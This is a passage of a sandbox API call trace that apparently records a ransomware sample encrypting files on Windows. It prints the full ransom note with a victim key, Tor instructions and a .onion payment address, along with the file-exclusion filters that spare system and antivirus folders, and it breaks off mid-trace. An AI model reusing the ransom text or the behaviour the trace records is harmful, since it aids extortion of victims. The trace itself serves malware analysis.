hFile=0x15b0, lpBuffer=0x609cc0, nNumberOfBytesToRead=0x0, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x609cc0*, lpNumberOfBytesRead=0x2d7e160*=0x0, lpOverlapped=0x0) returned 1 [0168.267] WriteFile (in: hFile=0x15c4, lpBuffer=0x609cc0*, nNumberOfBytesToWrite=0x0, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x609cc0*, lpNumberOfBytesWritten=0x2d7e15c*=0x0, lpOverlapped=0x0) returned 1 [0168.267] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\System\\ado\\en-US\\msader15.dll.mui" (normalized: "c:\\program files\\common files\\system\\ado\\en-us\\msader15.dll.mui")) returned 0x20 [0168.267] SetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\System\\ado\\en-US\\msader15.dll.mui", dwFileAttributes=0x20) returned 0 [0168.268] PathFileExistsW (pszPath="\\\\?\\C:\\Program Files\\Common Files\\System\\ado\\en-US\\msader15.dll.mui") returned 1 [0168.268] DeleteFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\System\\ado\\en-US\\msader15.dll.mui" (normalized: "c:\\program files\\common files\\system\\ado\\en-us\\msader15.dll.mui")) returned 0 [0168.268] wcscpy (in: _Dest=0x2d7dcb4, _Source="\\\\?\\C:\\Program Files\\Common Files\\System\\ado\\en-US\\msader15.dll.mui" | out: _Dest="\\\\?\\C:\\Program Files\\Common Files\\System\\ado\\en-US\\msader15.dll.mui") returned="\\\\?\\C:\\Program Files\\Common Files\\System\\ado\\en-US\\msader15.dll.mui" [0168.268] PathRemoveFileSpecW (in: pszPath="\\\\?\\C:\\Program Files\\Common Files\\System\\ado\\en-US\\msader15.dll.mui" | out: pszPath="\\\\?\\C:\\Program Files\\Common Files\\System\\ado\\en-US") returned 1 [0168.268] GetTempFileNameW (in: lpPathName="\\\\?\\C:\\Program Files\\Common Files\\System\\ado\\en-US", lpPrefixString=".xX", uUnique=0x0, lpTempFileName=0x2d7debc | out: lpTempFileName="\\\\?\\C:\\Program Files\\Common Files\\System\\ado\\en-US\\.xX4DD.tmp" (normalized: "c:\\program files\\common files\\system\\ado\\en-us\\.xx4dd.tmp")) returned 0x4dd [0168.269] MoveFileExW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\System\\ado\\en-US\\msader15.dll.mui" (normalized: "c:\\program files\\common files\\system\\ado\\en-us\\msader15.dll.mui"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\System\\ado\\en-US\\.xX4DD.tmp" (normalized: "c:\\program files\\common files\\system\\ado\\en-us\\.xx4dd.tmp"), dwFlags=0x1) returned 0 [0168.269] DeleteFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\System\\ado\\en-US\\.xX4DD.tmp" (normalized: "c:\\program files\\common files\\system\\ado\\en-us\\.xx4dd.tmp")) returned 1 [0168.270] CryptDestroyKey (hKey=0x9ad1f8) returned 1 [0168.270] wcslen (_String="OK") returned 0x2 [0168.270] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0168.270] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0168.270] CryptDestroyKey (hKey=0x9ad7f8) returned 1 [0168.270] CryptDestroyHash (hHash=0x9ad838) returned 1 [0168.270] CryptReleaseContext (hProv=0x8e3bb0, dwFlags=0x0) returned 1 [0168.270] FindNextFileW (in: hFindFile=0x9ad438, lpFindFileData=0x2d7e3bc | out: lpFindFileData=0x2d7e3bc) returned 0 [0168.270] GetLastError () returned 0x12 [0168.270] FindClose (in: hFindFile=0x9ad438 | out: hFindFile=0x9ad438) returned 1 [0168.270] _wfopen (_FileName="\\\\?\\C:\\Program Files\\Common Files\\System\\ado\\en-US\\Recovers your files.html" (normalized: "c:\\program files\\common files\\system\\ado\\en-us\\recovers your files.html"), _Mode="w") returned 0x77ac1268 [0168.270] fputs (in: _Str=" Encrypted files!

Your Key: a8ba77dad846516d1a6737c4237beea3b25e325279bbf473010960209657e13a

Encrypted files!

All your files are encrypted.Using AES256-bit encryption and RSA-2048-bit encryption.
Making it impossible to recover files without the correct private key.
If you are interested in getting is the key and recover your files
You should proceed with the following steps.

The only way to decrypt your files safely is to buy the Descrypt and Private Key software.

Any attempts to restore your files with the third-party software will be fatal for your files!

Important use Firefox or Chrome browser

To proceed with the purchase you must access one of the link below

If neither of the links is online for a long period of time, there is another way to open it, you should install the Tor Browser

If your personal page is not available for a long period there is another way to open your personal page - installation and use of Tor Browser:

  1. run your Internet browser (if you do not know what it is run the Internet Explorer);
  2. enter or copy the address https://www.torproject.org/download/download-easy.html.en into the address bar of your browser and press ENTER;
  3. wait for the site loading;
  4. on the site you will be offered to download Tor Browser; download and run it, follow the installation instructions, wait until the installation is completed;
  5. run Tor Browser;
  6. connect with the button 'Connect' (if you use the English version);
  7. a normal Internet browser window will be opened after the initialization;
  8. type or copy the address

    https://lylh3uqyzay3lhrd.onion

    in this browser address bar;
  9. press ENTER;
  10. the site should be loaded; if for some reason the site is not loading wait for a moment and try again.
If you have any problems during installation or use of Tor Browser, please, visit https://www.youtube.com and type request in the search bar 'Install Tor Browser Windows' and you will find a lot of training videos about Tor Browser installation and use.

Your Key: a8ba77dad846516d1a6737c4237beea3b25e325279bbf473010960209657e13a
", _File=0x77ac1268 | out: _File=0x77ac1268) returned 0 [0168.271] fclose (in: _File=0x77ac1268 | out: _File=0x77ac1268) returned 0 [0168.271] wcslen (_String="Unfortunately crypted files: ") returned 0x1d [0168.271] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0168.271] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0168.271] wcslen (_String="Fortunately ignored files because of filters: ") returned 0x2e [0168.271] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0168.271] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0168.271] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\System\\en-US\\*", pszSpec="*.exe") returned 0 [0168.271] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\System\\en-US\\*", pszSpec="*.dll") returned 0 [0168.271] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\System\\en-US\\*", pszSpec="*.lnk") returned 0 [0168.271] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\System\\en-US\\*", pszSpec="*.bat") returned 0 [0168.271] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\System\\en-US\\*", pszSpec="*.ini") returned 0 [0168.271] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\System\\en-US\\*", pszSpec="*.msi") returned 0 [0168.271] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\System\\en-US\\*", pszSpec="*.scf") returned 0 [0168.271] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\System\\en-US\\*", pszSpec="*pagefile.sys*") returned 0 [0168.271] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\System\\en-US\\*", pszSpec="*NTUSER.DAT*") returned 0 [0168.271] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\System\\en-US\\*", pszSpec="*AppData*") returned 0 [0168.271] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\System\\en-US\\*", pszSpec="*\\winrar\\*") returned 0 [0168.271] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\System\\en-US\\*", pszSpec="*\\Internet Explorer\\*") returned 0 [0168.271] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\System\\en-US\\*", pszSpec="*\\java\\*") returned 0 [0168.271] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\System\\en-US\\*", pszSpec="*\\TeamViewer\\*") returned 0 [0168.271] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\System\\en-US\\*", pszSpec="*\\windows\\*") returned 0 [0168.272] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\System\\en-US\\*", pszSpec="*\\ESET\\*") returned 0 [0168.272] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\System\\en-US\\*", pszSpec="*\\AVG\\*") returned 0 [0168.272] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\System\\en-US\\*", pszSpec="*\\AVIRA\\*") returned 0 [0168.272] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\System\\en-US\\*", pszSpec="*\\AVAST Software\\*") returned 0 [0168.272] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\System\\en-US\\*", pszSpec="*Atheros*") returned 0 [0168.272] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\System\\en-US\\*", pszSpec="*Realtek*") returned 0 [0168.272] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\System\\en-US\\*", pszSpec="*bootmgr*") returned 0 [0168.272] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\System\\en-US\\*", pszSpec="*boot*") returned 0 [0168.272] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\System\\en-US\\*", pszSpec="*boot*") returned 0 [0168.272] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\System\\en-US\\*", pszSpec="*CONFIG.SYS*") returned 0 [0168.272] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\System\\en-US\\*", pszSpec="*IO.SYS*") returned 0 [0168.272] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\System\\en-US\\*", pszSpec="*MSDOS.SYS*") returned 0 [0168.272] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\System\\en-US\\*", pszSpec="*NTDETECT.COM*") returned 0 [0168.272] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\System\\en-US\\*", pszSpec="*ntldr*") returned 0 [0168.272] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\System\\en-US\\*", pszSpec="*chrome*") returned 0 [0168.272] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\System\\en-US\\*", pszSpec="*opera*") returned 0 [0168.272] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\System\\en-US\\*", pszSpec="*firefox*") returned 0 [0168.272] wcslen (_String="\\\\?\\") returned 0x4 [0168.272] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Program Files\\Common Files\\System\\en-US\\*", lpFindFileData=0x2d7e89c | out: lpFindFileData=0x2d7e89c) returned 0x9ad438 [0168.272] wcscmp (_String1=".", _String2=".") returned 0 [0168.272] FindNextFileW (in: hFindFile=0x9ad438, lpFindFileData=0x2d7e89c | out: lpFindFileData=0x2d7e89c) returned 1 [0168.272] wcscmp (_String1="..", _String2=".") returned 1 [0168.272] wcscmp (_String1="..", _String2="..") returned 0 [0168.272] FindNextFileW (in: hFindFile=0x9ad438, lpFindFileData=0x2d7e89c | out: lpFindFileData=0x2d7e89c) returned 1 [0168.272] PathMatchSpecW (pszFile="wab32res.dll.mui", pszSpec="*NMCRYPT") returned 0 [0168.272] PathMatchSpecW (pszFile="wab32res.dll.mui", pszSpec="*Recovers your files.html") returned 0 [0168.272] PathMatchSpecW (pszFile="wab32res.dll.mui", pszSpec="*.exe") returned 0 [0168.272] PathMatchSpecW (pszFile="wab32res.dll.mui", pszSpec="*.dll") returned 0 [0168.272] PathMatchSpecW (pszFile="wab32res.dll.mui", pszSpec="*.lnk") returned 0 [0168.272] PathMatchSpecW (pszFile="wab32res.dll.mui", pszSpec="*.bat") returned 0 [0168.272] PathMatchSpecW (pszFile="wab32res.dll.mui", pszSpec="*.ini") returned 0 [0168.272] PathMatchSpecW (pszFile="wab32res.dll.mui", pszSpec="*.msi") returned 0 [0168.272] PathMatchSpecW (pszFile="wab32res.dll.mui", pszSpec="*.scf") returned 0 [0168.272] PathMatchSpecW (pszFile="wab32res.dll.mui", pszSpec="*pagefile.sys*") returned 0 [0168.272] PathMatchSpecW (pszFile="wab32res.dll.mui", pszSpec="*NTUSER.DAT*") returned 0 [0168.272] PathMatchSpecW (pszFile="wab32res.dll.mui", pszSpec="*AppData*") returned 0 [0168.272] PathMatchSpecW (pszFile="wab32res.dll.mui", pszSpec="*\\winrar\\*") returned 0 [0168.272] PathMatchSpecW (pszFile="wab32res.dll.mui", pszSpec="*\\Internet Explorer\\*") returned 0 [0168.272] PathMatchSpecW (pszFile="wab32res.dll.mui", pszSpec="*\\java\\*") returned 0 [0168.272] PathMatchSpecW (pszFile="wab32res.dll.mui", pszSpec="*\\TeamViewer\\*") returned 0 [0168.273] PathMatchSpecW (pszFile="wab32res.dll.mui", pszSpec="*\\windows\\*") returned 0 [0168.273] PathMatchSpecW (pszFile="wab32res.dll.mui", pszSpec="*\\ESET\\*") returned 0 [0168.273] PathMatchSpecW (pszFile="wab32res.dll.mui", pszSpec="*\\AVG\\*") returned 0 [0168.273] PathMatchSpecW (pszFile="wab32res.dll.mui", pszSpec="*\\AVIRA\\*") returned 0 [0168.273] PathMatchSpecW (pszFile="wab32res.dll.mui", pszSpec="*\\AVAST Software\\*") returned 0 [0168.273] PathMatchSpecW (pszFile="wab32res.dll.mui", pszSpec="*Atheros*") returned 0 [0168.273] PathMatchSpecW (pszFile="wab32res.dll.mui", pszSpec="*Realtek*") returned 0 [0168.273] PathMatchSpecW (pszFile="wab32res.dll.mui", pszSpec="*bootmgr*") returned 0 [0168.273] PathMatchSpecW (pszFile="wab32res.dll.mui", pszSpec="*boot*") returned 0 [0168.273] PathMatchSpecW (pszFile="wab32res.dll.mui", pszSpec="*boot*") returned 0 [0168.273] PathMatchSpecW (pszFile="wab32res.dll.mui", pszSpec="*CONFIG.SYS*") returned 0 [0168.273] PathMatchSpecW (pszFile="wab32res.dll.mui", pszSpec="*IO.SYS*") returned 0 [0168.273] PathMatchSpecW (pszFile="wab32res.dll.mui", pszSpec="*MSDOS.SYS*") returned 0 [0168.273] PathMatchSpecW (pszFile="wab32res.dll.mui", pszSpec="*NTDETECT.COM*") returned 0 [0168.273] PathMatchSpecW (pszFile="wab32res.dll.mui", pszSpec="*ntldr*") returned 0 [0168.273] PathMatchSpecW (pszFile="wab32res.dll.mui", pszSpec="*chrome*") returned 0 [0168.273] PathMatchSpecW (pszFile="wab32res.dll.mui", pszSpec="*opera*") returned 0 [0168.273] PathMatchSpecW (pszFile="wab32res.dll.mui", pszSpec="*firefox*") returned 0 [0168.273] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\System\\en-US\\wab32res.dll.mui", pszSpec="*") returned 1 [0168.273] strlen (_Str="NMoreira") returned 0x8 [0168.273] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.273] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.273] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.273] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.273] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.273] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.273] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.273] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.273] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.273] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.273] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.273] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.273] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.273] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.273] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.273] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.273] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.273] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.273] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.273] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.273] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.273] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.273] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.273] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.273] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.273] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.273] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.273] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.273] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.274] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.274] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.274] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.274] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.274] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.274] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.274] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.274] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.274] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.274] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.274] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.274] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.274] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.274] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.274] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.274] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.274] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.274] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.274] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.274] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.274] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.274] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.274] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.274] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.274] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.274] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.274] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.274] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.274] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.274] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.274] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.274] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.274] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.274] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.274] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.274] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.274] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.274] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.274] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.274] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.274] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.274] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.274] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.274] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.274] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.274] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.274] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.274] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.274] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.274] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.274] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.274] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.275] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.275] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.275] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.275] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.275] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.275] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.275] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.275] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.275] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.275] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.275] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.275] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.275] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.275] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.275] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.275] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.275] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.275] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.275] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.275] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.275] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) 